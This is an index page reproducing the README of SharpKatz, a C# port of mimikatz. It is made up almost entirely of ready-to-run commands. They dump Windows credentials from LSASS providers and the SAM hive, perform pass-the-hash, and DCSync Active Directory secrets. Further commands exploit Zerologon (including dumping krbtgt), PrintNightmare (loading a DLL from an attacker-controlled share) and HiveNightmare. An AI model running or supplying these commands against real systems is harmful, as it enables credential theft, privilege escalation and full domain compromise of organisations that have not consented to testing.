Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/b4rtik/SharpKatz

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
https://github.com/b4rtik/SharpKatz

Last synced: about 2 months ago
JSON representation

Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands

Awesome Lists containing this project

README 

        
# SharpKatz

Porting of mimikatz sekurlsa::logonpasswords,  sekurlsa::ekeys and lsadump::dcsync commands



## Usage



### Ekeys



```SharpKatz.exe --Command ekeys```


 list Kerberos encryption keys 


 



### Msv



```SharpKatz.exe --Command msv``` 


Retrive user credentials from Msv provider 






### Kerberos



```SharpKatz.exe --Command kerberos```


Retrive user credentials from Kerberos provider 






### Tspkg



```SharpKatz.exe --Command tspkg```


Retrive user credentials from Tspkg provider 






### Credman



```SharpKatz.exe --Command credman```


Retrive user credentials from Credman provider 






### WDigest



```SharpKatz.exe --Command wdigest```


Retrive user credentials from WDigest provider 






### Logonpasswords



```SharpKatz.exe --Command logonpasswords```


Retrive user credentials from all providers 






### List shadowcopies



```SharpKatz.exe --Command listshadows```


Enumerate shadowcopies with NtOpenDirectoryObject and NtQueryDirectoryObject






### Lsadumpsam



```SharpKatz.exe --Command dumpsam --System \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM --Sam \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM```


Dump credential from provided sam database






### Pth



```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash```


Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password





```SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key```


Perform pth to create a process under userdomain\username credential user's rc4 key





```SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash```


Replace ntlm hash for an existing logonsession 





```SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes256 aes256```


Perform pth to create a process under userdomain\username credential with ntlm hash of the user's password and aes256 key 






### DCSync



```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc```


Dump user credential by username 





```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc```


Dump user credential by GUID 





```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc```


Export the entire dataset from AD to a file created in the current user's temp forder





```SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```


Dump user credential by username using alternative credentials





```SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```


Dump user credential by GUID using alternative credentials





```SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc --AuthUser authuser --AuthDomain authdomain --AuthPassword authuserpassword```


Export the entire dataset from AD to a file created in the current user's temp forder using alternative credentials






### Zerologon



No reference to logoncli.dll, using the direct rpc call works even from a [non-domain joined workstation](https://twitter.com/gentilkiwi/status/1306178689630076929)



```SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```


Perform Zerologon check 





```SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$```


Perform Zerologon attack 





```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local```


Perform Zerologon attack and dump user credential by username 





```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --Guid guid --DomainController WIN-NSE5CPCP07C.testlab2.local```


Perform Zerologon attack and dump user credential by GUID 





```SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --DomainController WIN-NSE5CPCP07C.testlab2.local```


Perform Zerologon attack and export the entire dataset from AD to a file created in the current user's temp forder





Note: Do not use zerologon in a production environment or at least plan for recovery actions which are detailed [here](https://github.com/dirkjanm/CVE-2020-1472) 



### PrintNightmare CVE-2021-1675 - CVE-2021-34527



```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll```


Perform PrintNightmare attack 





```SharpKatz.exe --Command printnightmare --Target dc --Library \\\\mycontrolled\\share\\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom```


Perform PrintNightmare attack with provided credentials






### HiveNightmare CVE-2021-36934



```SharpKatz.exe --Command hiveghtmare```


Exploit HiveNightmare vulnerability selecting the first available shadowcopy 






## Credits



This project depends entirely on the work of [Benjamin Delpy](https://twitter.com/gentilkiwi) and [Vincent Le Toux](https://twitter.com/mysmartlogon) on [Mimikatz](https://github.com/gentilkiwi/mimikatz) and [MakeMeEnterpriseAdmin](https://raw.githubusercontent.com/vletoux/MakeMeEnterpriseAdmin/master/MakeMeEnterpriseAdmin.ps1) projects.


The analysis of the code was conducted following the example from [this blog post](https://blog.xpnsec.com/exploring-mimikatz-part-1/) by [xpn](https://twitter.com/_xpn_).